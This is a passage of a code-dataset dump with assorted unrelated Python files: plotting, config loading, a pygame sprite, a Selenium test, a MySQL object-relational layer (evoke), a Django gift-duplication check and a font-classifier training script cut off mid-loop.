cols=3,\n specs=[[{'is_3d': True}, {'is_3d': True}, {'is_3d': True}]],\n subplot_titles=['Latent Activation 1', 'Latent Activation 2', 'Latent Activation 3'],\n )\n t=torch.as_tensor(np.zeros((batch_size,1)))\n t=t.float()\n L1,L2,L3=np.zeros(batch_size),np.zeros(batch_size),np.zeros(batch_size)\n ks,bs=np.zeros(batch_size),np.zeros(batch_size)\n Y=np.zeros(50); T=[i for i in range(0,50)]\n r=10 # tempo escolhido para a pergunta da rede neural\n for i in range(batch_size):\n t[i][0]=question[0,i,r]\n for aux in range(0,1):#n_batch):\n for rdn_batch in range(0,batch_size):\n y,latent=model(inp[aux].float(),t)\n L1[rdn_batch] = latent[rdn_batch][0].detach().numpy()\n L2[rdn_batch] = latent[rdn_batch][1].detach().numpy()\n L3[rdn_batch] = latent[rdn_batch][2].detach().numpy()\n ks[rdn_batch] = K[aux][rdn_batch]\n bs[rdn_batch] = B[aux][rdn_batch]\n fig.add_trace(go.Scatter3d(x=bs,y=ks,z=L1,mode='markers',marker=dict(\n size=12,color=L1,colorscale='Viridis',opacity=0.8)), 1, 1)\n fig.add_trace(go.Scatter3d(x=bs,y=ks,z=L2,mode='markers',marker=dict(\n size=12,color=L2,colorscale='Viridis',opacity=0.8)), 1, 2)\n fig.add_trace(go.Scatter3d(x=bs,y=ks,z=L3,mode='markers',marker=dict(\n size=12,color=L3,colorscale='Viridis',opacity=0.8)), 1, 3)\n fig.show()\n#Latent_values_Scynet1()\n#--------------------------------------------------------------------------\ndef Latent_values_Scynet2():\n fig = plt.figure(figsize=plt.figaspect(0.5))\n ax1 = fig.add_subplot(1, 3, 1, projection='3d')\n ax2 = fig.add_subplot(1, 3, 2, projection='3d')\n ax3 = fig.add_subplot(1, 3, 3, projection='3d')\n t=torch.as_tensor(np.zeros((batch_size,1)))\n t=t.float()\n L1,L2,L3=np.zeros(batch_size),np.zeros(batch_size),np.zeros(batch_size)\n Y=np.zeros(50); T=[i for i in range(0,50)]\n r=25\n for i in range(batch_size):\n t[i][0]=question[0,i,r]\n #rdn_batch=rd.randint(0,batch_size)\n #aux=[i for i in range(0,n_batch)]\n for aux in range(0,n_batch):\n for rdn_batch in range(0,batch_size):\n #YY=inp[aux][rdn_batch].detach().numpy()\n y,latent=model(inp[aux].float(),t)\n #y=y.detach().numpy()[rdn_batch]\n #Y[interval]=y\n L1[rdn_batch] = latent[rdn_batch][0].detach().numpy()\n L2[rdn_batch] = latent[rdn_batch][1].detach().numpy()\n L3[rdn_batch] = latent[rdn_batch][2].detach().numpy()\n um = latent[rdn_batch][0].detach().numpy()#.reshape(500)\n #um = latent[rdn_batch][0].detach().numpy()#.reshape(500)\n dois = latent[rdn_batch][1].detach().numpy()#.reshape(500)\n #dois = latent[rdn_batch][1].detach().numpy()#.reshape(500)\n tres = latent[rdn_batch][2].detach().numpy()#.reshape(500)\n #tres = latent[rdn_batch][2].detach().numpy()#.reshape(500)\n um=np.array(um)\n dois=np.array(dois)\n tres=np.array(tres)\n k=np.array(K[aux][rdn_batch])\n b=np.array(B[aux][rdn_batch])\n #print(np.shape(B))\n #print(np.shape(K))\n #print(np.shape(L1))\n #print(um)\n #s.exit()\n surf=ax1.scatter3D(k, b, L1,label='Latent Activation 1' )\n surf=ax2.scatter3D(k, b, L2,label='Latent Activation 2' )\n surf=ax3.scatter3D(k, b, L3,label='Latent Activation 3' )\n plt.show()\n#Latent_values_Scynet2()\n","sub_path":"Box1.py","file_name":"Box1.py","file_ext":"py","file_size_in_byte":11861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"98370311","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCONFIG\n------\n对配置的封装\n\"\"\"\nimport os\nfrom configparser import ConfigParser\nCONF_PATH = os.path.join(os.path.dirname(os.getcwd()), \"conf/config.conf\")\n# print(CONF_PATH, \"姜振康\")\n# DICT_PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.dirname(os.getcwd())), \"nlp_learn/data/ner_data/\"))\n# print(DICT_PATH)\n__config = None\n\n\ndef get_config(config_file_path= CONF_PATH):\n \"\"\"\n 单例配置获取\n \"\"\"\n global __config\n if not __config:\n config = ConfigParser()\n config.read(config_file_path)\n else:\n config = __config\n return config\n","sub_path":"flast_practice/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"219460995","text":"books = [\"ULYSSES\",\"ANIMAL FARM\",\"BRAVE NEW WORLD\",\"ENDER'S GAME\"]\nbook_dict = {}\nfor i in books :\n print(i)\n length_str = len(i)\n un_str = len(list(set(i)))\n print(length_str)\n print(un_str)\n average = (length_str+un_str)/2\n current_tup = (length_str , un_str , average)\n book_dict[i] = current_tup\nprint(book_dict)\n ","sub_path":"lab7/ex2-3.py","file_name":"ex2-3.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"397501482","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Ship(Sprite):\n def __init__(self, settings, surface):\n \"\"\"Initialize the ship and set its starting position.\"\"\"\n\n super(Ship, self).__init__()\n self.surface = surface\n self.settings = settings\n\n # Load the ship image and get its rect.\n self.image = pygame.image.load(\"images/ship.bmp\")\n self.rect = self.image.get_rect()\n self.surfaceRect = surface.get_rect()\n\n # Start each new ship at the bottom center of the surface.\n self.rect.centerx = self.surfaceRect.centerx\n self.rect.bottom = self.surfaceRect.bottom\n\n # Store a decimal value for the ship's center.\n self.center = float(self.rect.centerx)\n\n # Movement flag\n self.movingRight = False\n self.movingLeft = False\n\n def update(self):\n \"\"\"Update the ship's position based on movement flags.\"\"\"\n\n # Update the ship'scenter value, not the rect.\n if self.movingRight and self.rect.right < self.surfaceRect.right:\n self.center += self.settings.shipSpeedFactor\n if self.movingLeft and self.rect.left > 0:\n self.center -= self.settings.shipSpeedFactor\n\n # Update rect object from self.center.\n self.rect.centerx = self.center\n\n def blit(self):\n \"\"\"Draw the ship at its current location.\"\"\"\n\n self.surface.blit(self.image, self.rect)\n\n def centerShip(self):\n \"\"\"Center the ship on the screen.\"\"\"\n\n self.center = self.surfaceRect.centerx","sub_path":"AlienInvasion/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"353218474","text":"def fp(n):\n\tvalues = [1,2,5,10,20,50,100,200]\n\n\tpossibilities = [0]*(n+1)\n\tpossibilities[0] = 1\n\t\n\t\"\"\"First finds #possibilities if only using 1 pence coins.\n\tThen adds the # possibilities once a 2 pence coin is introduced\n\tand so on\"\"\"\n\tfor val in values:\n\t\tfor i in range(1,n+1):\n\t\t\tif not(i - val < 0):\n\t\t\t\tpossibilities[i] += possibilities[i - val]\n\treturn possibilities[n]","sub_path":"Problems 31 - 40/problem 31/problem31.py","file_name":"problem31.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"368367057","text":"from selenium import webdriver\nimport unittest\nimport os,time\nclass Baidu1(unittest.TestCase):\n def setUp(self):\n self.driver=webdriver.Chrome()\n self.base_url=\"http://www.baidu.com\"\n self.driver.maximize_window()\n self.errors=[]\n self.accept_newxt_alert=True\n def tearDown(self):\n self.driver.quit()\n self.assertEqual([],self.errors)\n # @ unittest.skip(\"skipping\")\n def test_search(self):\n self.driver.get(self.base_url)\n self.driver.implicitly_wait(5)\n self.driver.find_element_by_id(\"kw\").send_keys(\"高校开学\")\n self.driver.find_element_by_id(\"su\").click()\n time.sleep(5)\n def test_hao(self):\n self.driver.get(self.base_url)\n self.driver.find_element_by_link_text(\"hao123\").click()\n time.sleep(6)\n if __name__=='__main__':\n unittest.main(verbosity=2)","sub_path":"2020-4-14-selenium/src0416/text1.py","file_name":"text1.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"266502593","text":"\"\"\"\nevoke MySQL database interface: \n\n(Christopher J Hurst 2003 onwards) \n(modified Ian Howie Mackenzie Nov 2005 onwards)\n\"\"\"\n\nfrom .schema import *\nfrom evoke.lib import Permit\nfrom time import time\nfrom pickle import loads, dumps\n\n\nclass DataObject(object):\n \"Basic Model of a Persistent Data Object\"\n __implements__ = 'DataObjectInterface' # apart from the class methods\n\n def __init__(self, fields):\n \"fields - [track changes for these names]\"\n self._v_changed = {}\n self._v_fields = fields\n\n def __setattr__(self, name, value):\n \"keep track of changed atts\"\n object.__setattr__(self, name, value)\n if '_v_' not in name and name in self._v_fields:\n self._v_changed[name] = True\n\n def __delattr__(self, name):\n \"keep track of changed atts\"\n object.__delattr__(self, name)\n if name in self._v_changed:\n del self._v_changed[name]\n\n def update(self, args):\n \"Update Object Fields\"\n x = [\n setattr(self, k, v) for k, v in list(args.items())\n if k in self._v_fields\n ]\n\n def flush(self, only=[]):\n \"return dictionary of changes, then reset self._v_changed\"\n #print \"flush2\"\n res = {}\n changed = self._v_changed\n # filter by only if present\n if only:\n # print \">>>>>>>>>>>>>> flushing only \",only\n keys = [i for i in list(changed.keys()) if i in only]\n d = {}\n for k in keys:\n d[k] = changed[k]\n changed = d\n # set object atts\n for i in changed:\n res[i] = getattr(self, i)\n self._v_changed = {}\n return res\n\n\nclass SQLDataObject(DataObject):\n \"MySQL backed persistence\"\n _v_schema = {}\n _v_fields = []\n\n # Initialisation\n def __init__(self):\n self._v_changed = {}\n\n def __setattr__(self, name, value):\n \"for object attributes, create a new instance with the new value, thus converting it as required\"\n if name in self._v_schema:\n # print \"CLASS\",self._v_schema[name].__name__\n # print \"SET====\",name,value\n value = self._v_schema[name](\n value\n ) #create an instance of the relevant type, thus processing value where required\n# print \" TO:\",value\n DataObject.__setattr__(self, name, value)\n\n def __getattribute__(self, name):\n \"\"\n value = object.__getattribute__(self, name)\n if value and isinstance(value, REL):\n value = self.__class__.__dict__[name.capitalize()].get(value)\n object.__setattr__(\n self, name, value\n ) #bypass DataObject here, as we are not changing anything\n return value\n\n def sql(self):\n \"for use by REL attributes that have been substituted (by __getattribute__ above) with evoke objects (which have RemoteDataObject as a mix-in)\"\n return self.uid\n\n def flush(self, only=[]):\n \"save changes to db, filtered by only\"\n changes = DataObject.flush(self, only=only)\n if not changes:\n return\n# print \">>>> changes >>>>>\",changes.items(),\n# for (k,v) in changes.items():\n# print \">>>> change >>>>>\",k,v,type(v),repr(v),str(v)\n#fields = self.quoted_pairs(changes.items())\n# fix order of changes dict by converting to a list of tuples\n\n# handle REL objects\n for k in changes:\n if isinstance(changes[k], REL):\n changes[k] = int(changes[k])\n if hasattr(changes[k], 'uid'):\n changes[k] = changes[k].uid\n # and DATE objects\n if isinstance(changes[k], DATE):\n changes[k] = changes[k].sql(quoted=False)\n\n items = list(changes.items())\n\n fields = ', '.join((\"`%s`=%%s\" % k) for k, v in items)\n # list of fields ready for MySQLdb parameters.\n # self.uid always last in the list\n values = tuple([v for k, v in items] + [self.uid])\n\n sql = \"update %s set %s where uid=%%s\" % (self.table, fields)\n # print \">>>> SQL >>>>>\",r\"%s\" % sql\n #print sql\n execute(sql, values)\n\n def quoted_pairs(self, items, op='='):\n \"quote key,value pairs according to _v_schema \"\n fields = []\n for k, v in items:\n if not isinstance(v, (Schema, DataObject)):\n v = self._v_schema[k](v)\n fields.append(\"`%s` %s %s\" % (k, op, v.sql()))\n return \", \".join(fields)\n\n @classmethod\n def sql_quoted_pairs(self, items, op='=', link=', '):\n \"return sql and list of args suitable for mySQLdb arg substitution\"\n fields = []\n sqlargs = []\n for k, v in items:\n if not isinstance(v, (Schema, DataObject)):\n v = self._v_schema[k](v)\n fields.append(\"`%s` %s %%s\" % (k, op))\n sqlargs.append(v.sql(quoted=False))\n sql = (\" %s \" % link).join(fields)\n return sql, sqlargs\n\n\n# Error Classes for MassProducedSQLDataObject\nclass RecordNotFoundError(Error):\n \"%s with uid=%d not found\"\n\n\nclass RecordInUseError(Error):\n \"%s with uid=%d is still in use\"\n\n\nclass ListParameterConflictError(Error):\n \"You shouldn't call list with a non-default what parameter when asObjects is true.\"\n\n\nclass SQLArgumentMismatchError(Error):\n \"Number of arguments does not match number required by SQL statement.\"\n\n\nclass InvalidOrderFieldError(Error):\n \"Field in ORDER BY clause not found for this object.\"\n\n\nclass InvalidOrderDirectionError(Error):\n \"Direction in ORDER BY clause not valid.\"\n\n\nclass Subscriptable(type):\n \"\"\"metaclass to allow a class to be subscripted\"\"\"\n\n def __getitem__(cls, x):\n return cls.get(x)\n\n\nclass MassProducedSQLDataObject(SQLDataObject, metaclass=Subscriptable):\n \"SQL data object for use with makeDataClass\"\n\n @classmethod\n def ns_table(cls):\n \"\"\n db, tbl = cls.table.replace('`', '').split('.', 1)\n if hasattr(cls, 'ns'):\n s = '`%s`.`%s`' % (db + '_' + cls.ns, tbl)\n #print 'ns=', s\n else:\n s = cls.table\n return s\n\n @classmethod\n def exists(cls, uid):\n \"return true if a record with this uid exists\"\n sql = 'select * from %s where uid=%%s' % (cls.table, )\n _data = execute(sql, (uid, ))\n return len(_data) > 0\n\n def get(cls, uid, data={}):\n \"get database record and return it as an object\"\n if not data:\n # send uid as a proper MySQLdb parameter\n sql = 'select * from %s where uid=%%s' % (cls.table, )\n _data = execute(sql, (uid, ))\n if not _data:\n raise RecordNotFoundError(cls.table, uid)\n data = _data[0]\n ob = cls()\n #create the instance attributes\n # ob.update(data)\n for k, v in list(data.items()\n ): # as per update(data) but allow extra data fields\n setattr(ob, k, v)\n # clear the change queue, so the defaults are not needlessly updated\n ob._v_changed = {}\n\n # call __init__\n if hasattr(cls.__bases__[0], '__init__'):\n cls.__bases__[0].__init__(ob)\n\n return ob\n\n __getitem__ = classmethod(get) #### works for instance, but not class :s\n get = classmethod(get)\n # allow for get overrides\n __get__ = get\n\n @classmethod\n def tryget(cls, uid):\n \"a bombproof get()\"\n try:\n return get(cls, uid)\n except:\n return None\n\n @classmethod\n def new(cls):\n \"create a new database record and return it as a an object\"\n id = execute('insert into %s() values()' % cls.table)\n return cls.get(id)\n\n def delete(self, uid=0):\n \"remove self (or the database record with given uid: uid is for retro compat.)\"\n sql = 'delete from %s where uid=%%s' % (self.table, )\n execute(sql, (uid or self.uid, ))\n\n def clone(self):\n \"create a clone of self, flush it, and return it\"\n ob = self.new()\n for k in (i for i in self._v_fields if i != 'uid'):\n setattr(ob, k, getattr(self, k))\n ob.flush()\n return ob\n\n def all_change(self):\n \"mark all fields as changed where their value is not None\"\n changed = dict((i, True) for i in self._v_fields\n if getattr(self, i) is not None)\n self._v_changed.update(changed)\n\n def pickle(self):\n \"return pickled representation of the object's fields\"\n return dumps(dict((k, getattr(self, k)) for k in self._v_fields))\n\n def pickle_update(self, pkl):\n \"update object with pickled dict\"\n d = loads(pkl)\n self.update(d)\n\n #### Test Purposes\n @classmethod\n def X_list(self, *a, **k):\n \"Testing purposes - run old and new variations, compare results and time taken\"\n k['_debug'] = 1\n # old version\n oldstart = time()\n oldres = self.old_list(*a, **k)\n oldtime = time() - oldstart\n\n # new version\n newstart = time()\n newres = self.old_list(*a, **k)\n newtime = time() - newstart\n\n #print \"LIST: old=%d / %.4f new=%d / %.4f\" % (len(oldres), oldtime, len(newres), newtime)\n #assert oldres==newres, \"Old and new list give different results\"\n return newres\n\n @classmethod\n @Permit('no way')\n def old_list(cls,\n asObjects=True,\n sql='',\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n pager=-1,\n pagelength=20,\n what='*',\n _debug=False,\n **criteria):\n \"\"\"return list of objects (if obs) or data filtered by these criteria\n sql with asObjects=True requires 'select *' to give fully valid objects, so 'what' should not be used with asObjects=False \n \"\"\"\n ob = cls() # we need an instance of our class for quoted_pairs\n # sql overrides all other parameters\n if not sql:\n pairs = ob.quoted_pairs(list(criteria.items())).replace(\n ',', ' and ')\n likes = ob.quoted_pairs(\n list(like.items()), op='like').replace(',', ' and ')\n orderby = orderby and 'order by %s' % orderby or ''\n limit = limit and 'limit %s' % limit or ''\n # page overrides limit\n if pager != -1:\n start = int(pager) * int(pagelength)\n limit = 'limit %d,%d' % (start, int(pagelength))\n\n # for in clauses we wildly assume that this will be passed a list of strings or ints...\n ins = ' and '.join('`%s` in %s' % (k, sql_list(v))\n for k, v in list(isin.items()))\n sql = \"select %s from %s %s %s %s %s\" % (\n what, cls.table,\n (pairs or likes or ins or where) and 'where' or '',\n ' and '.join(i for i in (pairs, likes, ins, where)\n if i), orderby, limit)\n if _debug:\n #print \"LIST:\", sql\n pass\n data = execute(sql)\n if asObjects:\n data = [cls.get(i['uid'], data=i) for i in data]\n del ob, cls\n return data\n\n #list.permit='no way' # disable direct web access\n #list=classmethod(list)\n\n @classmethod\n @Permit('no way')\n def list(cls,\n asObjects=True,\n sql='',\n sqlargs=(),\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n pager=-1,\n pagelength=20,\n what='*',\n _debug=False,\n **criteria):\n \"\"\"return list of objects (if obs) or data filtered by these criteria\n sql with asObjects=True requires 'select *' to give fully valid objects, so 'what' should not be used with asObjects=False \n \n Parameters:\n cls = class of current object\n asObjects \n = False: return a list of dictionaries \n = True: return list of objects of the current class\n sql = full sql query. Parameters to be sent as tuple via sqlargs \n sqlargs = tuple containing values to substitute into sql/where parameters.\n like = dict of form {fieldname:matchpattern}\n maps to sql 'fieldname LIKE \"matchpattern\" and otherfieldname LIKE \"othermatchpattern\"'\n isin = dict of form {fieldname:list-of-values}\n orderby = sql ORDER BY clause\n where = sql WHERE clause. Parameters to be sent as tuple via sqlargs \n limit = sql LIMIT clause\n pager = Start page of results divided by page length. Overrides limit parameter\n pageLength = length of pages - use in combination with pager parameter\n what = fields to be returned by query DEPRECATED CJH 20130408\n we can't use sql args with field names so this is in practise a minute risk..\n _debug = if True print prepared sql statement \n **criteria = remaining field value pairs map to WHERE statement assersions which must all be true\n\n eg. self.list(x=5,y='something') -> 'WHERE x=5 and y=\"something\"'\n \"\"\"\n # make sure we don't combine non-default 'what' with asObjects=True\n if asObjects and what != '*':\n raise ListParameterConflictError\n\n # # `what` parameter DEPRECATED CJH 20130408 ( WHY? IHM 20141111)\n # if what !='*':\n # print \"DEPRECATED: evoke.data.list `what` parameter is deprecated\"\n\n # sql overrides all other parameters except sqlargs\n if sql:\n # no further action required\n pass\n else:\n # build up sql from criteria\n if where:\n sqlparts = [where]\n sqlargs = list(sqlargs)\n else:\n sqlparts = []\n sqlargs = []\n\n # criteria\n if criteria:\n # print\">>>>>> criteria items >>>>>\"\n # for k,v in criteria.items():\n # print k,v\n criteria_sql, criteria_args = cls.sql_quoted_pairs(\n list(criteria.items()), link='and')\n sqlparts.append(criteria_sql)\n sqlargs += criteria_args\n\n # like\n if like:\n like_sql, like_args = cls.sql_quoted_pairs(\n list(like.items()), op='like', link='and')\n like_sql = like_sql.replace(\"%\", \"%%\").replace(\n '%%s', '%s') # double the % wildcard (but not any %s)\n sqlparts.append(like_sql)\n sqlargs += like_args\n\n # isin\n for isin_field, isin_values in list(isin.items()):\n if not isin_values:\n continue\n isin_sql = ' %s in (%s)' % (\n isin_field, ', '.join(['%s'] * len(isin_values)))\n isin_args = list(isin_values)\n sqlparts.append(isin_sql)\n sqlargs += isin_args\n\n # orderby - as field names can't be used in mySQLdb argument\n # substitution we make sure this only includes field names\n # optionally quoted with ``, separated by commas and optionally\n # including desc.\n orderby = cls.parse_orderby(orderby)\n if orderby:\n orderby = \" ORDER BY %s\" % orderby\n\n # limit and paging\n if pager == -1:\n limit = limit and 'LIMIT %s' % limit or ''\n else:\n start = int(pager) * int(pagelength)\n limit = 'LIMIT %d,%d' % (start, int(pagelength))\n\n # We should have a complete query. Convert args into a tuple\n # and test we have the right number of substitutions\n where = sqlparts and 'where' or ''\n whereclauses = (' and '.join(sqlparts)).replace(\"%\", \"%%\").replace(\n '%%s', '%s') # double the % wildcard (but not any %s)\n sql = 'select %s from %s %s %s %s %s' % (what, cls.ns_table(),\n where, whereclauses,\n orderby, limit)\n sqlargs = tuple(sqlargs)\n try:\n nowt = sql % sqlargs\n #except TypeError:\n except:\n print(\"data.list unmatched arguments. There are %d arguments.\"\n % len(sqlargs))\n print(sql)\n print(sqlargs)\n raise SQLArgumentMismatchError\n\n # ready to go\n # optionally show our query.\n if _debug:\n print(\"LIST:\", sql)\n print(\"LIST:\", sqlargs)\n pass\n # execute query\n data = execute(sql, sqlargs)\n\n # if _debug:\n # print \"DATA COUNT:\", len(data)\n\n # convert to objects if required\n if asObjects:\n data = [cls.get(i['uid'], data=i) for i in data]\n\n return data\n\n @classmethod\n def parse_orderby(self, orderby):\n \"sanitise sql order by clause - can't use normal mySQLdb parameter substitution as it quotes field names\"\n # print \"parse_orderby not implemented\"\n return orderby\n\n parts = [i.strip().split(' ', 1) for i in orderby.split(',')]\n clauses = []\n\n for part in parts:\n field = part[0].strip().replace('`', '')\n if not field:\n continue\n direction = (len(part) > 1 and part[1] or '').strip().upper()\n\n # field should be in self._v_fields\n if field not in self._v_fields:\n print(\"invalid field\", field)\n raise InvalidOrderFieldError\n\n # direction should be empty or one of ASC|DESC\n if direction not in ('', 'ASC', 'DESC'):\n raise InvalidOrderDirectionError\n\n clauses.append('`%s`%s%s' % (field, direction and ' ' or '',\n direction))\n return ', '.join(clauses)\n\n @classmethod\n def count(cls,\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n **criteria):\n \"\"\"return count of data filtered by these criteria\n \"\"\"\n return cls.list(\n asObjects=False,\n like=like,\n isin=isin,\n orderby=orderby,\n where=where,\n limit=limit,\n what=\"count(uid)\",\n **criteria)[0][\"count(uid)\"]\n\n @classmethod\n def list_int(cls,\n item='uid',\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n **criteria):\n \"\"\"return list of integers from item (column) filtered by these criteria\n \"\"\"\n return [\n int(i[item])\n for i in cls.list(\n asObjects=False,\n sql=\"\",\n like=like,\n isin=isin,\n orderby=orderby,\n where=where,\n limit=limit,\n what=\"`%s`\" % item,\n **criteria)\n ]\n\n @classmethod\n def max(cls,\n item='uid',\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n **criteria):\n \"\"\"return max of item (column) filtered by these criteria\n \"\"\"\n what = 'max(%s)' % item\n return cls.list(\n asObjects=False,\n sql=\"\",\n like=like,\n isin=isin,\n orderby=orderby,\n where=where,\n limit=limit,\n what=what,\n **criteria)[0][what]\n\n @classmethod\n def min(cls,\n item='uid',\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n **criteria):\n \"\"\"return min of item (column) filtered by these criteria\n \"\"\"\n what = 'min(%s)' % item\n return cls.list(\n asObjects=False,\n sql=\"\",\n like=like,\n isin=isin,\n orderby=orderby,\n where=where,\n limit=limit,\n what=what,\n **criteria)[0][what]\n\n @classmethod\n def sum(cls,\n item='uid',\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n **criteria):\n \"\"\"return min of item (column) filtered by these criteria\n \"\"\"\n what = 'sum(%s)' % item\n return cls.list(\n asObjects=False,\n sql=\"\",\n like=like,\n isin=isin,\n orderby=orderby,\n where=where,\n limit=limit,\n what=what,\n **criteria)[0][what]\n\n\n# export / import\n\n def for_export(self, extras=[]):\n \"convert object to a dictionary (for pickling) - include only standard fields, plus given extras\"\n return dict((k, v) for k, v in list(self.__dict__.items())\n if k in self._v_fields or k in extras)\n\n # Dummy methods for leak testing\n @classmethod\n def mundane(self, *a, **k):\n return 'OK'\n\n\n#renote removed for now - see data_remote.py\n\n\ndef makeDataClass(Schema):\n \"Set up a custom SQL data class\"\n #dbc = Connection('makeDataClass')\n #db = Cursor(dbc)\n db = None\n # we only need to get the field info once per class\n data = { #'db':db\n 'table':Schema.tablesql\n , '_v_schema': Schema._v_schema\n , '_v_fields': list(Schema._v_schema.keys())\n , '_v_textkeys': Schema._v_textkeys\n , '_v_multikeys': Schema._v_multikeys\n }\n # return type(Schema.table.capitalize(), (RemoteSQLDataObject,), data)\n return type(Schema.table.capitalize(), (MassProducedSQLDataObject, ),\n data) #remote disabled for now\n\n\n# TESTS\nif __name__ == '__main__':\n # Data Object\n c = DataObject(['camelid', 'ox'])\n # let's start with a clear run\n assert c.flush() == {}, \"Flush should be empty\"\n # Check for a valid change\n c.camelid = 'llama'\n assert c.flush() == {'camelid': 'llama'}, \"setattr noworks\"\n assert c.flush() == {}, \"Flush should be empty\"\n # _v_ attributes don't register change\n c._v_gonewiththewind = 'Frankly'\n assert c.flush() == {}, \"Flush should be empty\"\n c.gnu = 'GNU'\n assert c.flush() == {}, \"Flush should be empty\"\n c.update({'ox': 'OXEN'})\n assert c.flush() == {'ox': 'OXEN'}, \"update noworks\"\n c.update({'ox': 'OXEN'})\n del c.ox\n assert c.flush() == {}, \"Flush should be empty\"\n\n # filter flush by only\n c.camelid = 'Alpaca'\n res = c.flush(only=['bison'])\n assert res == {}, \"Flush should be empty\"\n","sub_path":"evoke/data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":22951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"241910016","text":"# -*- coding: utf-8 -*-\n\"\"\"\n各機能で複製されていないかチェックをおこなう関数群\n\"\"\"\nfrom gift.models import Gift\nfrom common.actionlog import ActionLogWriter\nfrom django.core.mail import mail_managers\nfrom django.conf import settings\nimport datetime\n\ndef send_duplicate_mail(title, message):\n mail_managers(title, message)\n \n\ndef check_duplicate_gift(request, category, latest_gift_list, from_player, target_player, gift, player_gift_id_or_instance, player_card, card_level=1, card_experience=0, card_ability_level=1):\n \"\"\"\n プレゼントで選手が複製されていないかの確認\n \"\"\"\n for latest_gift in latest_gift_list:\n # 以下の条件に当てはまると複製の可能性あり\n # 最新のgiftの作成日\n latest_gift_created_at = latest_gift.created_at\n # 今回のgiftの作成日\n gift_created_at = gift.created_at\n # 今回のgiftの作成日から1分前\n before_gift_created_at = gift_created_at - datetime.timedelta(minutes=1)\n \n if latest_gift_created_at == gift.created_at or (before_gift_created_at <= latest_gift_created_at and latest_gift_created_at <= gift_created_at):\n if latest_gift.card_id == gift.card_id and card_level == latest_gift.card_level and card_experience == latest_gift.card_experience and card_ability_level == latest_gift.card_ability_level:\n ActionLogWriter.duplicate_gift(request, from_player, target_player, category, player_gift_id_or_instance, card_level=gift.card_level, \n card_experience=gift.card_experience, card_ability_level=gift.card_ability_level, player_card=player_card)\n # メールも送る\n duplicate_mail_title = u'選手が複製された可能性があります'\n duplicate_mail_message = u'[from player id] %s [target player id] %s [card id] %s' % (from_player.pk, target_player.pk, gift.card_id)\n send_duplicate_mail(duplicate_mail_title, duplicate_mail_message)\n break","sub_path":"server/module/common/check_duplicate.py","file_name":"check_duplicate.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"452589884","text":"import torch\r\nimport torch.nn as nn\r\n\r\nimport torchvision\r\n\r\nimport numpy as np\r\n\r\nfrom torch.autograd import Variable\r\nfrom utils import getBatch\r\n\r\nclass fontEncoder(nn.Module):\r\n\r\n def __init__(self):\r\n super(fontEncoder, self).__init__()\r\n self.conv1 = nn.Sequential(\r\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=21, stride=2, padding=0),\r\n nn.InstanceNorm2d(num_features=16, track_running_stats=True),\r\n nn.ReLU()\r\n )\r\n self.conv2 = nn.Sequential(\r\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=7, stride=2, padding=0),\r\n nn.InstanceNorm2d(num_features=32, track_running_stats=True),\r\n nn.ReLU()\r\n )\r\n self.conv3 = nn.Sequential(\r\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, stride=1, padding=0),\r\n nn.InstanceNorm2d(num_features=64, track_running_stats=True),\r\n nn.ReLU()\r\n )\r\n # B*1*64*64 -> B*16*22*22 -> B*32*8*8 -> B*64*4*4\r\n self.fc = nn.Linear(1024, 256)\r\n \r\n def forward(self, x):\r\n x = self.conv1(x)\r\n x = self.conv2(x)\r\n x = self.conv3(x)\r\n x = x.view(x.size(0), x.size(1)*x.size(2)*x.size(3))\r\n\r\n output = self.fc(x)\r\n return output\r\n\r\nclass classifier(nn.Module):\r\n\r\n def __init__(self):\r\n super(classifier, self).__init__()\r\n self.fc1 = nn.Sequential(\r\n nn.Linear(256, 256),\r\n nn.ReLU()\r\n )\r\n self.fc2 = nn.Sequential(\r\n nn.Linear(256, 128),\r\n nn.ReLU()\r\n )\r\n self.fc3 = nn.Sequential(\r\n nn.Linear(128, 50), ############\r\n nn.Sigmoid()\r\n )\r\n \r\n def forward(self, x):\r\n x = self.fc1(x)\r\n x = self.fc2(x)\r\n x = self.fc3(x)\r\n\r\n return x\r\n\r\n\r\n\r\nbase = \"data/\"\r\nreadList = open(\"remaining.txt\").read().split()[:50] ##########\r\nbatch_size = 64\r\nNUM_EPOCH = 80 # 1200\r\nlearning_rate = 0.0003\r\n\r\nenc = fontEncoder().cuda()\r\ncla = classifier().cuda()\r\n\r\nloss_function = nn.CrossEntropyLoss().cuda()\r\noptimizer = torch.optim.Adam(list(enc.parameters()) + list(cla.parameters()), lr=learning_rate)\r\n\r\ntrain_set = getBatch(base, readList, BATCH_SIZE=batch_size)\r\n\r\nfor epoch in range(NUM_EPOCH):\r\n \r\n print(\"current epoch: \", epoch)\r\n\r\n for index, (image, label) in enumerate(train_set):\r\n optimizer.zero_grad()\r\n\r\n image = image.cuda()\r\n label = label.cuda()\r\n\r\n embedding = enc(image)\r\n output = cla(embedding)\r\n\r\n 